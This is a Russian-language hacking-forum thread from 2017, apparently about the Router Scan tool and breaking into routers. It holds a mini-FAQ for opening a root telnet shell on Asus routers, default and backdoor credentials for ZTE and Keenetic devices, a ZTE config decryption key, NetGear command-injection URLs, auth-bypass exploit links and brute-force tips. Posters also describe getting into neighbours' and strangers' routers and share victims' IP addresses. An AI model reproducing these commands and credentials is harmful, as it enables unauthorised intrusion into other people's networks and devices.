nvram show - много чего вкусного и wifi...<br/>
nvram show | grep admin - acc_list=admin>jhfdsfhjkBLA (wifi pass) * acc_webdavproxy=admin>1<br/>
хм а где жу PussyLogin? ....<br/>
nvram show | grep http - о да. http_username=PussyLogin * http_lanport=65533 (хз) * http_passwd=blablabla<br/>
тут стало ясно asusPWD и burp со своим error_page.htm давали мне пароль, но не говарили мне логин нормальный.

пользовался:

https://habrahabr.ru/post/230469/

https://habrahabr.ru/post/253013/

http://mycyberuniverse.com/ru/linux/full-controling-the-asus-router-via-command-line.html

http://www.foxnetwork.ru/index.php/component/content/article/134-asus-rt-n14u.html - самая полезная ссылка



хабрахабра )) вам не знаком github? или на крайняк wasm? на хабре если и есть что, то только в комментах )) в остальном полностью продажный ресурс (как и все вокруг))). остальное на хабре, к действительности никакого отношения уже давно не имеет.

conar
17.05.2017, 00:22
Вот что-то про asusы https://www.securityforrealpeople.com/2014/04/CVE-2014-2719-Asus-RT-Password-Disclosure.html

conar
17.05.2017, 16:45
zte сдался но не брутом. Это встроенная учетка и через веб морду не залезет. Оказалось все проще. Нашел сайт с коллекцией паролей по умолчанию. http://www.cleancss.com/router-default/ZTE/ZXHN_H298N подошел user:user. Один кенетик тоже сдался почти без боя. Заметил что у всех старых кенетиков телнет без пароля вообще. Если получилось к кенетику подключиться через телнет то cd /bin Потом flash get ADMIN_NAME потом flash get ADMIN_PASSWORD и вот получили данные для входа в веб морду. Может кому пригодится.

P.S На кенетиках есть какая-то странная встроенная учетка SUPER_NAME "t0u34" с паролем SUPER_PASSWORD "i@t0D93u34jf~34:j#L9.Sd" только что это и зачем непонятно...

Kakoluk
19.05.2017, 18:11
Может ли кто нибудь запустить https://github.com/j91321/rext/blob/master/modules/decryptors/zte/config_zlib_decompress.py?

И попробовать прогнать конфиг: https://yadi.sk/d/hvO056tW3JGn87

Криптобиблиотеку никак под 2.7-ой питон никак не найду.

muradddddd
20.05.2017, 10:39
новый способ узнать пароль wifi соседей ишите в настройках роутра wan ip адресс например 172.20.1.59 потом идете в роутер скан и прописывайте 172.20.0.59-172.20.100.255 и старт. И не забудьте в настройках роутер скан везде галки поставить.

Triton_Mgn
20.05.2017, 10:40
новый способ узнать пароль wifi соседей ишите в настройках роутра wan ip адресс например 172.20.1.59 потом идете в роутер скан и прописывайте 172.20.0.59-172.20.100.255 и старт. И не забудьте в настройках роутер скан везде галки поставить.



Ну да, ну да...

V777
20.05.2017, 10:43
Ну да, ну да...

fffsfs
20.05.2017, 11:07
новый способ узнать пароль wifi соседей ишите в настройках роутра wan ip адресс например 172.20.1.59 потом идете в роутер скан и прописывайте 172.20.0.59-172.20.100.255 и старт. И не забудьте в настройках роутер скан везде галки поставить.



Что за роутер

Сид:YOTA

BSSID:b0:38:29:16:74:67

Вещает 24/7

Kakoluk
20.05.2017, 11:11
Что за роутер

Сид:YOTA

BSSID:b0:38:29:16:74:67

Вещает 24/7



Siliconware Precision Industries Co., Ltd.

Сделайте запрос BSSID тут http://3wifi.stascorp.com/find , такого вида: B0:38:29:*

muradddddd
20.05.2017, 11:13
Что за роутер

Сид:YOTA

BSSID:b0:38:29:16:74:67

Вещает 24/7



ну обычный wifi роутер тп линк

fffsfs
20.05.2017, 11:20
ну обычный wifi роутер тп линк



Какой тп линк ты че? Он без ВПС даже

fffsfs
20.05.2017, 11:21
Siliconware Precision Industries Co., Ltd.

Сделайте запрос BSSID тут http://3wifi.stascorp.com/find , такого вида: B0:38:29:*


Что за Силиконовая долина у них? 0.о

fffsfs
20.05.2017, 11:23
Ег



Siliconware Precision Industries Co., Ltd.

Сделайте запрос BSSID тут http://3wifi.stascorp.com/find , такого вида: B0:38:29:*


Его нету жаль(

Kakoluk
20.05.2017, 12:22
Ег

Его нету жаль(



Ну именно вашего нет, но это уже кое что, и можно посмотреть с чем этих зверей едят.

carartem02
20.05.2017, 12:29
А этот эксплоит есть?

https://vulners.com/exploitdb/EDB-ID:42039

binarymaster
20.05.2017, 14:50
Что за роутер

Сид:YOTA

BSSID:b0:38:29:16:74:67

Вещает 24/7



Это карманный 4G модем Yota, такие Router Scan'ом пока не поддерживаются.



А этот эксплоит есть?

https://vulners.com/exploitdb/EDB-ID:42039



Похоже что нет, спасибо, посмотрю.

Kakoluk
20.05.2017, 16:52
"ZTE ZXHN H168N V3.1, firmware: ZXHN H168N V3.1 V3.1.0T9_TH4"



.. есть возможность дать проход к телнету одного такого чудища.

Cвязка на телнет есть, никак не могу в shell проскользнуть. (собственная голова уже старая )

Явки и пароли дам в личку, что бы не не затопили запросами роутер, и не спугнули хозяина.

sha9
20.05.2017, 21:46
новый способ узнать пароль wifi соседей ишите в настройках роутра wan ip адресс например 172.20.1.59 потом идете в роутер скан и прописывайте 172.20.0.59-172.20.100.255 и старт. И не забудьте в настройках роутер скан везде галки поставить.



интересно, а если поставить так - 172.20.0.59/24 ? тоже новый способ.так еще никто не пробовал.говорят помогает и результат еще круче...

Felis-Sapiens
20.05.2017, 22:03
есть возможность дать проход к телнету одного такого чудища.

Cвязка на телнет есть, никак не могу в shell проскользнуть. (собственная голова уже старая )

Явки и пароли дам в личку, что бы не не затопили запросами роутер, и не спугнули хозяина.



Да я вчера уже зашёл на один (пришлось сменить порт на 2323). В shell тоже попал - FNNSD3zxhnh168nv31:Zxhnh168nv31 (https://www.isrbija.net/showthread....-Telekomovog-vDSL-ZXHN-H168N-V3-1-i-ZTE-H267N). И даже файл cspd слил. Потом доковыряю.

sha9
20.05.2017, 22:09
А этот эксплоит есть?

https://vulners.com/exploitdb/EDB-ID:42039



спасибо за ссылку.там еще много интересного есть...

carartem02
20.05.2017, 22:33
спасибо за ссылку.там еще много интересного есть...



Там ещё бот в телеграме есть, который оповещает об уязвимости (сам так узнал) Если интересно - @vulnersBot

muradddddd
20.05.2017, 23:17
интересно, а если поставить так - 172.20.0.59/24 ? тоже новый способ.так еще никто не пробовал.говорят помогает и результат еще круче...



не так он до 100не сканирует там от 0 до 100должен сканировать ip адреса

sha9
20.05.2017, 23:51
не так он до 100не сканирует там от 0 до 100должен сканировать ip адреса



в таком случае 172.16.0.0/12. диапазон зарезервированных айпи адресов. тут и ваши 0-100

уважаемый,прежде чем удивлять всех "новыми способами", ознакомитесь для начала с базовыми принципами распределения айпи адресов.почитайте для начала, ну хотя-бы мануал к роутерскану (я не говорю уже о серьезных учебных материалах), а также ветку форума, куда хотите запостить свое сообщение. посмотрите на опыт и знания тех, кого вы хотите удивить (я сейчас не о себе). тогда не будете попадать в глупое положение.

п.с. и научитесь отличать иронию от серьезного обсуждения.

muradddddd
21.05.2017, 00:31
незнаю про роутер скан смотрел многа видео все через сайт ip адреса ишут ничего про wan ip несказано в роутере у меня на сайте другой ip выдает а в роутере в настройках совсем другой ip прописан.

Kakoluk
21.05.2017, 00:34
незнаю про роутер скан смотрел многа видео все через сайт ip адреса ишут ничего про wan ip несказано в роутере у меня на сайте другой ip выдает а в роутере в настройках совсем другой ip прописан.



брррр. Хотя бы запятые, Карл. Иначе, ваш код очень сложно с разбегу разглядеть.

sha9
21.05.2017, 23:06
незнаю про роутер скан смотрел многа видео все через сайт ip адреса ишут ничего про wan ip несказано в роутере у меня на сайте другой ip выдает а в роутере в настройках совсем другой ip прописан.



вот потому и существуют инструкции и мануалы. в частности к роутерскану. нужно немного читать, а не видосы просматривать и кнопки тыкать. тогда бы вы знали, что и как ищут. и для чего. немного узнали-бы о принципах организации внешних и внутренних сетей. и узнали, почему " в роутере у меня на сайте другой ip выдает а в роутере в настройках совсем другой ip прописан." кроме того, если бы вы читали мануал к роутерскану и эту ветку форума - то не выдали такой замечательный перл как "И не забудьте в настройках роутер скан везде галки поставить. " т.к. некоторые модули в настоящий момент не поддерживаются. и ставить "все галки" бессмысленно.

п.с. много - пишется через О, не знаю - раздельно, не сказано - раздельно. неМНОГО грамотности тоже не помешало-бы юным хакерствующим личностям. это так, размышления вслух.

malik
24.05.2017, 09:30
напишите пожалуйста ip которые по умолчанию стоят в программе ?

Ossen
24.05.2017, 10:37
напишите пожалуйста ip которые по умолчанию стоят в программе ?



а когда программу запускаете вы разве их не видите?? они вам в глаза смотрят

Kakoluk
24.05.2017, 10:44
напишите пожалуйста ip которые по умолчанию стоят в программе ?



Если вы имеете в виду локальные маски:


192.168.0-10,100,199.1,254
10.0.0.1-10.0.0.254
172.16.0.0/12

binarymaster
24.05.2017, 11:05
напишите пожалуйста ip которые по умолчанию стоят в программе ?



Просто удалите (или переименуйте) файл ranges.txt, и запустите RS. Он их сбросит в дефолт.

Ossen
24.05.2017, 11:49
явную ссылку на RS, прямо с ресурса(3WIFI)?



На ночные сборки.

binarymaster
24.05.2017, 18:01
Вопрос: - Хеши, не(чего то я не уверен)?



Не хеши, скорее такие пароли.

binarymaster
24.05.2017, 18:52
Смущает строка с "qtech", явное нарушение синтаксиса, что нибудь можно исправить?

Хочется в коте покрутить, а тот мурзится.


$1$S3IVv.Qr$c9j8g3Yc8o/MtH3NV5Mcw/

Просто экранирующие символы.

binarymaster
24.05.2017, 22:06
http://router-scan.ru/

Внезапно. Кто-нибудь тестировал?

Kozloff73
24.05.2017, 22:25
http://router-scan.ru/

Внезапно. Кто-нибудь тестировал?


Крякнутая

Kakoluk
24.05.2017, 22:25
http://router-scan.ru/

Внезапно. Кто-нибудь тестировал?


А вот тут вообще весело:

"

1) ОСТОРОЖНО! Для предотвращения установки рекламного ПО от Stas'M Corp. предварительно в обязательном порядке установите adguardInstaller.exe

2) Выполните запуск RouterScan.exe

"

А так, клон от 16-го года. Не конкурент.

P.S.

И именно по этому, нужно официальный источник изготовить, а то припяют какую нибудь гадость, а все шишки будут на создателя.

binarymaster
24.05.2017, 22:36
Крякнутая



А на нём что, когда-то стояла какая-то защита? Расскажите, интересно.



И именно по этому, нужно официальный источник изготовить, а то припяют какую нибудь гадость, а все шишки будут на создателя.



Кстати, ещё один интересный факт, настоящий оф. сайт из выдачи гугла пропал, копаю.

V777
24.05.2017, 22:45
А вот тут вообще весело:

"

1) ОСТОРОЖНО! Для предотвращения установки рекламного ПО от Stas'M Corp. предварительно в обязательном порядке установите adguardInstaller.exe

2) Выполните запуск RouterScan.exe

"

А так, клон от 16-го года. Не конкурент.

P.S.

И именно по этому, нужно официальный источник изготовить, а то припяют какую нибудь гадость, а все шишки будут на создателя.





+7 (495) 947-52-33 Москва . Реклама adguard ?

Kakoluk
24.05.2017, 22:58
Кстати, ещё один интересный факт, настоящий оф. сайт из выдачи гугла пропал, копаю.



В яндексе шестая выдача по счёту(с рекламой), на stascorp.com. Какой то перекачаный этот rоuter-scаn.ru, первая выдача (прям как бройлерный цыплёнок).

binarymaster
24.05.2017, 22:58
+7 (495) 947-52-33 Москва . Реклама adguard ?



Похоже на то. Но они поленились сделать ссылки меню в футере сайта.



Какой то перекачаный этот rоuter-scаn.ru, первая выдача (прям как бройлерный цыплёнок).



Накачан SEO-допингом.



Кстати, ещё один интересный факт, настоящий оф. сайт из выдачи гугла пропал, копаю.



UPD: Всё-таки ссылка в гугле ещё есть, просто сильно упала.

http://router-scan.ru/images/logo.png

Новый логотип тоже ничего, возьму на заметку. Правда придётся перекрасить, чтобы не нарушить чьих-то авторских прав.

binarymaster
24.05.2017, 23:22
Реклама adguard ?



И в продолжение расследования:

http://image.prntscr.com/image/dc09296983754cbbb573ee68f9e7296a.png

The cake is a lie.

Kozloff73
25.05.2017, 01:54
А на нём что, когда-то стояла какая-то защита? Расскажите, интересно.


ну так на сайте написано ... тип лицензии - крякнутая[/QUOTE]

Ossen
25.05.2017, 11:21
Кстати, ещё один интересный факт, настоящий оф. сайт из выдачи гугла пропал, копаю.



Мог кстати и из за этого упасть http://stascorp.com/load/1-1-0-56 антивирус блокирует доступ к сайту

binarymaster
25.05.2017, 11:32
антивирус блокирует доступ к сайту



Какой именно антивирус?

CRACK211
25.05.2017, 11:49
Какой именно антивирус?



Мой нод32 блокирует)

Потенциальная попытка фишинга

Эта страница определена как страница фишинга. Показать URL-адрес

Страницы фишинга зачастую делают похожими на страницы известных банков или других заслуживающих доверия учреждений с целью получения личных данных, таких как имена пользователей, пароли или данные кредитных карт. Переходить на эту страницу не рекомендуется.

Ossen
25.05.2017, 12:20
Какой именно антивирус?



нод 32 и на другом компе каспер

sha9
25.05.2017, 12:21
Мог кстати и из за этого упасть http://stascorp.com/load/1-1-0-56 антивирус блокирует доступ к сайту



кстати, файерфокс, хром давно уже выдает такую хе...ю. при входе на сайт. "страница содержит нежелательный контент" или что-то типа того. здорово роутерскан наделал шума, что его начали вносить в блокировку даже именитые бренды и накручивать сео на имени роутрескана бомба - она и есть бомба

Ossen
25.05.2017, 12:26
кстати, файерфокс, хром давно уже выдает такую хе...ю. при входе на сайт.



Да есть такое и давненько

V777
25.05.2017, 12:28
кстати, файерфокс, хром давно уже выдает такую хе...ю. при входе на сайт. "страница содержит нежелательный контент" или что-то типа того. здорово роутерскан наделал шума, что его начали вносить в блокировку даже именитые бренды и накручивать сео на имени роутрескана бомба - она и есть бомба


https://www.kali.org/ тоже нужно занести в ... "страница содержит нежелательный контент" или что-то типа того"

Ossen
25.05.2017, 12:32
Какой именно антивирус?



Попробуй сертификат ssl на оба сайта подвесить и на выдачу положительно повлияет ну и лишних блокировок со стороны браузеров итп не будет тут пробные на три месяца есть https://www.emaro-ssl.ru/shop/Comodo/

Veil
25.05.2017, 13:04
кстати, файерфокс, хром давно уже выдает такую хе...ю. при входе на сайт. "страница содержит нежелательный контент" или что-то типа того. здорово роутерскан наделал шума, что его начали вносить в блокировку даже именитые бренды и накручивать сео на имени роутрескана бомба - она и есть бомба


"страница содержит нежелательный контент" - это призыв для школьников " Поссоны качайте тут ".

sha9
25.05.2017, 13:21
"страница содержит нежелательный контент" - это призыв для школьников " Поссоны качайте тут ".



они это и делают. а потом бомбят форум вопросами где взять пароль на архив

sha9
25.05.2017, 13:22
https://www.kali.org/ тоже нужно занести в ... "страница содержит нежелательный контент" или что-то типа того"



а блэк арч, в таком случае вообще нужно блокировать наглухо

TOX1C
25.05.2017, 16:36
А на нём что, когда-то стояла какая-то защита?



Да, стоял адский пизецкий небрутабельный пасс на архив. Школьники хакали, хакали, и наконец похакали защиту.

resident148
25.05.2017, 18:34
Еще забавляет на том сайте.

Топ-10 скачиваний


1Амиго для Windows

Felis-Sapiens
26.05.2017, 19:06
И попробовать прогнать конфиг: https://yadi.sk/d/hvO056tW3JGn87



http://rgho.st/8ww8N8wfz

Скрипт для расшифровки здесь:

https://mega.nz/#!7hhTSRpT!Ne0DKknp75ly6NYdZh-93QRAisNw4Z7aHL_3L-ign8M


./decode_zte_config.py config.bin config.bin.xml --key '402c38de39bed665'

Kakoluk
27.05.2017, 07:45
так на Rgho.st по ссылке уже не малый флуд развели.



С утра глянул по ссылке, .. и на мгновение, привиделись райские сады, и заунывный затяг ангелов. Утро не испорчено.

sha9
27.05.2017, 09:14
что-то я не понял. на rghost уже версия 2.54 роутерскана. что-то отстаем.народ идет вперед, а мы топчемся. или я что-то правильно не понял?

http://rgho.st/search?as=tags&s=RouterScan+последняя+версия

Kakoluk
27.05.2017, 09:22
что-то я не понял. на rghost уже версия 2.54 роутерскана. что-то отстаем.народ идет вперед, а мы топчемся. или я что-то правильно не понял?

http://rgho.st/search?as=tags&s=RouterScan+последняя+в рсия



Аааа, это из 2018-го года, Кто то обскакал(видимо на машине времени), всех.

sha9
27.05.2017, 09:27
Аааа, это из 2018-го года, Кто то обскакал(видимо на машине времени), всех.


да не... кто-то использует бренд. ради интереса скачал. вирусняков напихали, аж монитор на х...начал посылать

binarymaster
27.05.2017, 12:06
http://s019.radikal.ru/i604/1705/ea/2271b345b0db.jpg


Спасибо, что держите нас в курсе событий!

Видимо придётся вводить новый ББ-код [sarcasm]

Kakoluk
27.05.2017, 12:25
to binarymaster (https://forum.antichat.xyz/members/148032/).

А нельзя ли добавить в RS форму авторизации неких "Airocon Virtual Web Router"? На диапазоне(выбрал короткий участок): 178.44.128.0/17.

Похоже близки по прошивке с Airocon F@st 1744, v4, firmware: F1744R_V1.49_RTC_20E_832,

(конфиг: https://yadi.sk/d/MIVSBGpO3JZyiP , несколько образов: https://yadi.sk/d/nqWIJp8S3JaAk2 )

на том же диапазоне, но редко встречающиеся.

Я иногда таргетировано подбручиваю собственными(большими) словарями auth_basic.txt и auth_digest.txt.

Этих самых Airocon много, может напорюсь на связку, если сменили дефолтную. А там и до парса не далеко.

sha9
27.05.2017, 14:29
по поводу роутерскана 2.54 "последняя версия". при запуске выдает окно " не найден либ длл" и пихает папку rts в програм файл. в этой папке сидит троянчик удаленного управления ( не высокого качества поделка).единственно что сделали - поментили его как системный файл.прямо в папочке. папочка есть - а файлов вроде как нет. в общем - кто-то очень грубо сработал. слишком палевно. видимо школьники тренируются. каникулы начались и нечем занять свой пытливый ум

sha9
27.05.2017, 14:30
Видимо придётся вводить новый ББ-код [sarcasm]


лучше измените пароль на архив. этот уже видимо сбрутили, судя по тому, что давненько не было такого вопроса

muradddddd
27.05.2017, 21:12
Не качайте с этого сайта новый роутер скан вирус с рекламой яндекса комп завис несмог удалить пришлось востановление даных делать

Triton_Mgn
27.05.2017, 21:15
Да не новый он никакой

Kakoluk
27.05.2017, 21:16
Не качайте с этого сайта новый роутер скан вирус с рекламой яндекса комп завис несмог удалить пришлось востановление даных делать



Ваш опыт будет несомненно полезен. Где нибудь вконтакте/однокласниках/других_соцсетях.

Тут "слегка" поосторожнее и по-зубастее контингент.

...

Хочу "хештег"(это щас модно) презентовать. #МрачныеТехнари. "хакеры", уже моветон.

muradddddd
27.05.2017, 21:28
Ваш опыт будет несомненно полезен. Где нибудь вконтакте/однокласниках/других_соцсетях.

Тут "слегка" поосторожнее и по-зубастее контингент.


Спасибо буду знать

Kakoluk
27.05.2017, 21:31
Спасибо буду знать



Пустое. Иначе, как бы вы сюда попали. За #косплеем бежали?

muradddddd
27.05.2017, 21:44
Да не косплеем не бежал прост хотел wps pin от роутера хотел узнать и наткнулся на ваш сайт



Пустое. Иначе, как бы вы сюда попали. За #косплеем бежали?

Kakoluk
27.05.2017, 21:51
Да не косплеем не бежал прост хотел wps pin от роутера хотел узнать и наткнулся на ваш сайт



Следовательно, вы "наш парень"(c). Но читать придётся много(а читать, есть что). Крепитесь. Без учёбы и знаний никак. Простого ответа нет(как и всегда). (щас меня будут молчаливо полоскать ведущие программисты, за сдачу идеи)

В общем смотрите тут :

1. https://forum.antichat.ru/threads/310835/

2. https://forum.antichat.ru/threads/427654/

exzet
28.05.2017, 18:36
Камрады, подскажите, можно ли фильтром выловить одни TP-LINK'и? Задал такое правило: serv ncnt TP-LINK, но из 3к от сканированных адресов ни одного не поймал. Или я не дождался или в заголовке сервера у TP-LINK'ов нет такой строки?

binarymaster, большое спасибо за программу. Можно пару реквестов?

1) Было бы удобно, если в панели задач отражался прогрессбар

2) Возможно ли добавить простенький интерфейс для плагинов? Сейчас пока что интересует доступ к массиву IP диапазонов, чтобы можно было через плагин его менять.

binarymaster
28.05.2017, 22:53
1) Было бы удобно, если в панели задач отражался прогрессбар



У меня на Windows 7 в процессе сканирования блок программы в панели задач постепенно заполняется зелёным, одновременно с прогрессбаром.



Возможно ли добавить простенький интерфейс для плагинов? Сейчас пока что интересует доступ к массиву IP диапазонов, чтобы можно было через плагин его менять.



Такой интерфейс вряд ли будет, делать автоматизацию управления не планируется в принципе.

Возможно в будущем появится возможность подключения внешних модулей сканирования (аналогичных текущим встроенным).



Задал такое правило: serv ncnt TP-LINK, но из 3к от сканированных адресов ни одного не поймал.



Попробуйте "relm ncnt TP-LINK" (вместо пробелов табуляции, если будете вставлять в filter.txt).

exzet
29.05.2017, 12:57
У меня на Windows 7 в процессе сканирования блок программы в панели задач постепенно заполняется зелёным, одновременно с прогрессбаром.



В десятке такого, к сожалению, не наблюдаю.



Такой интерфейс вряд ли будет



Жаль, придется через ольку привязывать. Не воспринимайте как угрозу(лол), просто необходимость для личного использования. Иногда утомляет каждый раз через браузер получать айпи диапазоны. И от сканированные гуды не дают географического представления положения точки, только через контекстное меню выбранного BSSID'а, а если гудов несколько сотен или тысяч, то тут без автоматизации, увы, никак.



Попробуйте "relm ncnt TP-LINK" (вместо пробелов табуляции, если будете вставлять в filter.txt).



Спасибо, так заработало.

Кстати, скорей всего этот вопрос поднимали, но почему-то в ночной сборке 2.57 количество потоков не поднимается выше 125



http://router-scan.ru/

Внезапно. Кто-нибудь тестировал?


Это фейк, вот официальный сайт therouter.ru

У этого сиошника на этом айпи много подобных сайтов висит. А с поддоменом mail.therouter.ru еще интересней

binarymaster
29.05.2017, 13:10
Кстати, скорей всего этот вопрос поднимали, но почему-то в ночной сборке 2.57 количество потоков не поднимается выше 125


Зависит от установленного скоростного режима (есть в настройках).



Жаль, придется через ольку привязывать.



Ну, это тяжёлая артиллерия, тут вполне можно обойтись каким-нибудь Spy++ и отправкой сообщений через SendMessage.



Это фейк, вот официальный сайт therouter.ru



57.7 МБ? Это ж сколько эксплойтов впихнули

stos
29.05.2017, 13:14
cat /etc/passwd ...<br/>
открыт 3х значный..

пользовался:

https://habrahabr.ru/post/253013/



открытые порта!

asus n11p asuscmd not working.)

rt-12vp - work

миниFAQ

AsusCmd.exe в режиме cmd)

AsusCmd.exe "ls -ls" 192.168.1.1 (работает через раз так что пробуйте два раза)

выдача папок, значит все ок.

....

AsusCmd.exe "telnetd -l/bin/sh -p777" 192.168.1.1

открытие порта 777. -> "путти" telnet 777

nvram show | ........

...

profit!

//

Rs bug # если один раз запустил. второй раз не выдает результаты. фиксится перезапуском. )

ps69
29.05.2017, 16:30
dir-615 2.5.12 выдает :admin почему так? последняя сборка

binarymaster
29.05.2017, 16:45
dir-615 2.5.12 выдает <empty>:admin почему так? последняя сборка



Это хорошо или плохо?

И да, айпи в студию!

ps69
29.05.2017, 16:57
плохо. я в локале сканю( мтсный роутер 161

sha9
29.05.2017, 17:41
dir-615 2.5.12 выдает <empty>:admin почему так? последняя сборка



проверьте руками. может так оно и есть?

ps69
29.05.2017, 18:11
я пробовал. и другие стандартные комбинации тоже.

ps69
29.05.2017, 18:44
я думаю там пароль дугой стоит. а это глюк какой-то

Felis-Sapiens
29.05.2017, 22:50
dir-615 2.5.12 выдает <empty>:admin почему так? последняя сборка






Это хорошо или плохо?

И да, айпи в студию!



Нашёл D-Link DIR-300NRU rev.B5/B6 2.5.12 - 85.l92.l30.25

И - D-Link DSL-2640U 2.5.3 - 85.l92.l31.l57

user100
29.05.2017, 22:59
dir-615 2.5.12 выдает <empty>:admin почему так? последняя сборка



Был у меня dir-615 когда-то, так там был логин admin, а пароль пустой по дефалту. Может оно и у вас так?

Upd. Вспомнил. Там в 615 тупо логина не было а пассдефолтный был как-раз: admin

binarymaster
29.05.2017, 23:03
Нашёл D-Link DIR-300NRU rev.B5/B6 2.5.12 - 85.l92.l30.25

И - D-Link DSL-2640U 2.5.3 - 85.l92.l31.l57



Первый отпарсися корректно, а вот со вторым вроде баг.

binarymaster
29.05.2017, 23:14
D-Link DSL-2640U 2.5.3 - 85.l92.l31.l57



А проблема вот в чём, на вопрос:

GET /index.cgi?check_auth=y&update_login=&update_password=admin

Роутер отвечает:

{

is_ban: false,

is_auth: true

}

Однако это не есть правда. Вариант решения проблемы - не допускать перебора пустых логинов, т.к. они не поддерживаются вроде как.

exzet
30.05.2017, 04:41
Зависит от установленного скоростного режима (есть в настройках).



Разобрался. Дело было в том, что стоял таймаут в 2 секунды и, видимо, из за фильтрации потоки отрабатывают быстрее, чем отображаются в статусбаре.



Ну, это тяжёлая артиллерия, тут вполне можно обойтись каким-нибудь Spy++ и отправкой сообщений через SendMessage.



Ну это да, через SendMessage и инжект(для TstringGrid), а тяжелой артиллерией хочу добавить свою длл в таблицу импорта и провести инициализацию, чтобы при старте программы длл автоматом подгружалась.

binarymaster
30.05.2017, 10:57
Дело было в том, что стоял таймаут в 2 секунды и, видимо, из за фильтрации потоки отрабатывают быстрее, чем отображаются в статусбаре.



Тоже верно. В любом случае, регулятор потоков выступает лишь в роли ограничителя, а не количества.

binarymaster
30.05.2017, 23:05
не допускать перебора пустых логинов



Так и сделал.

Да кстати, эти новые д'Линки научились банить на 180 секунд при множественном переборе логина.

Netway
31.05.2017, 00:30
Доброго времени суток! Ввожу диапазон айпи своего провайдера и ничего не выдаёт, ни одного роутера. Ждал до половины и пробовал снова прописать, всё равно никак. В чём корень зла?

binarymaster
31.05.2017, 00:39
В чём корень зла?



Либо в закрытых портах, либо в NAT.

Чтобы сказать точнее, распишите настройки WAN вашего роутера (прямо из RS), и внешний IP-адрес.

muradddddd
31.05.2017, 00:55
Доброго времени суток! Ввожу диапазон айпи своего провайдера и ничего не выдаёт, ни одного роутера. Ждал до половины и пробовал снова прописать, всё равно никак. В чём корень зла?



http://ip.posle.info/ зайди на этот сайт и все ip твоего провайдера выдаст

Kakoluk
31.05.2017, 15:29
Заявка. Прошу посмотреть(up). И если можно, добавить форму авторизации.



D-Link DVG-N5402SP VoIP, firmware: RU_1.00

А из этого вытаскивает всю инфу D-Link DVG-N5402SP VoIP, firmware: RU_1.00, hardware: B1



77.108.192.0/18. И телнет у них чудной, ">" bruter не умеет с ним работать.

ps69
31.05.2017, 15:37
вот dlink 615 :admin из той же сети

8-800-555-3535

это глюк?

binarymaster
31.05.2017, 16:08
вот dlink 615 <empty>:admin из той же сети

85.117.87.68:161

это глюк?



Уже пофикшено.

Stine
31.05.2017, 21:37
Вопрос по librouter.dll.

Она ж рассчитана под многопоточность?

Я так понимаю, в примере все что до PrepareRouter, можно вынести за пределы потоков.

PrepareRouter(123, IP.dw, Port, hRouter), что такое 123? Какой row?

И как вытянуть результаты? Почему все в консоль выводится? Парсить придется? Не могу найти где все хранится...

И почему if Row <> 123 then Exit;? Не пойму принцип работы.

И как подключать свои эксплоиты?

binarymaster
31.05.2017, 23:06
Вопрос по librouter.dll.

Она ж рассчитана под многопоточность?



Да.



Я так понимаю, в примере все что до PrepareRouter, можно вынести за пределы потоков.



Верно.



PrepareRouter(123, IP.dw, Port, hRouter), что такое 123? Какой row?



Условный индекс строки в таблице, чтобы разбирать, откуда пришёл ответ.



И как вытянуть результаты? Почему все в консоль выводится? Парсить придется? Не могу найти где все хранится...

И почему if Row &lt;&gt; 123 then Exit;? Не пойму принцип работы.



Callback-функция - ключ к разгадке.



И как подключать свои эксплоиты?



Пока что никак.

a.forregs
31.05.2017, 23:31
Да.

Пока что никак.



а в чем трабла? и как долго будет это "Пока что никак." ?

binarymaster
31.05.2017, 23:48
а в чем трабла? и как долго будет это "Пока что никак." ?



А зачем? Чтобы любой желающий добавил какие-нибудь 0day и захватил весь мир?

zimmer
01.06.2017, 12:45
нашел прикольную уязвимость в D-Link DIR-600M Wireless N 150 Router(FirmWare Version : 3.04), типо 20 пробелов в поле пароля позваляет пройти авторизацию... http://ru.0day.today/exploit/27807

если есть у кого такой роутер, не могли бы опробывать и отписать о результате?...

видео

zimmer
01.06.2017, 12:54
еще один для Tenda N3 Wireless N150 Home Router, http://ru.0day.today/exploit/27064

если их нет в роутер скане, то думаю можно добавить...

видео

zimmer
01.06.2017, 19:04
еще одна уязвимость для

NetGear модели R6250 R6400 R6700 R6900 R7000 R7100LG R7300DS R7900 R8000 D6220 D6400

суть уязвимости:http://[router-address]/cgi-bin/;uname$IFS-a получаем информацию о роутере

CVE-2016-6277 уязвимость исправлена, но как мы знаем не все спешат обновлять прошивки..

также в ней же другим запросом телнет поднять можно, но в RS нет такой возможности

если имеется уже, то прошу извенить.

binarymaster
01.06.2017, 19:13
/cgi-bin/;uname$IFS-a



Этот эксплойт уже реализован вроде.

zimmer
01.06.2017, 19:27
Этот эксплойт уже реализован вроде.



а найденные уязвимости сюда постить или можеть есть\сделать отдельную тему? и еще вопрос, в роутер скане тольке эксплоиты только те которые позволяют получить информацию и обойти авторизацию? т.е. удаленное исполнение кода, и прочие нет смысла постить?

(на больничном валяюсь и вот решил поискать роутеры и камеры в сети, по пути уязвимости к ним)

a.forregs
01.06.2017, 19:34
binarymaster, а чего хотя бы api не замутить для добавления сплоитов? хрен с вами, можно и на вашем серваке. но на сколько я понял за долгое пребывание тут, вы не тянете это к сожалению. "секретные пароли для избранных", "ночные сборки для приближенных", все это работало раньше. пора взрослеть. потенциал какой-никакой у вас - есть.

аудитория давно позволяет.

zimmer
01.06.2017, 19:48
и еще до кучи

не парсит и не подбирает пароль в qnap qts web server qts-212 (инфо показывает такую http server 1.0) пароль и логин тупо админ, если нужен доступ для добавления, то айпишник могу в личку скинуть..

Kakoluk
01.06.2017, 22:00
binarymaster, а чего хотя бы api не замутить для добавления сплоитов? хрен с вами, можно и на вашем серваке. но на сколько я понял за долгое пребывание тут, вы не тянете это к сожалению. "секретные пароли для избранных", "ночные сборки для приближенных", все это работало раньше. пора взрослеть. потенциал какой-никакой у вас - есть.

аудитория давно позволяет.



Я всё думаю, чего вы так покровительственно и занудно binarymaster-а (https://forum.antichat.xyz/members/148032/) зазываете?

Неужто, в даркнете совсем кончились образованные программисты?

Одни скрипт-кидди остались?

carartem02
02.06.2017, 00:06
ночные сборки для приближенных



Разве? Ночные сборки прямо тут для всех постились (я их замечал раньше)

binarymaster
02.06.2017, 00:19
"секретные пароли для избранных"



Если бы вы знали историю проекта, у вас было бы понимание, с каких пор и почему пошла традиция паролить архив.



а чего хотя бы api не замутить для добавления сплоитов? хрен с вами, можно и на вашем серваке.



У нас всё просто, эксплойты постят участники сообщества в этой теме, а разработчики их добавляют в RS. Так безопаснее.

Ossen
02.06.2017, 00:23
традиция паролить архив



Кстати свежей запароленной ночной сборки нет?)

binarymaster
02.06.2017, 00:24
а найденные уязвимости сюда постить или можеть есть\сделать отдельную тему?



Всё постить сюда.



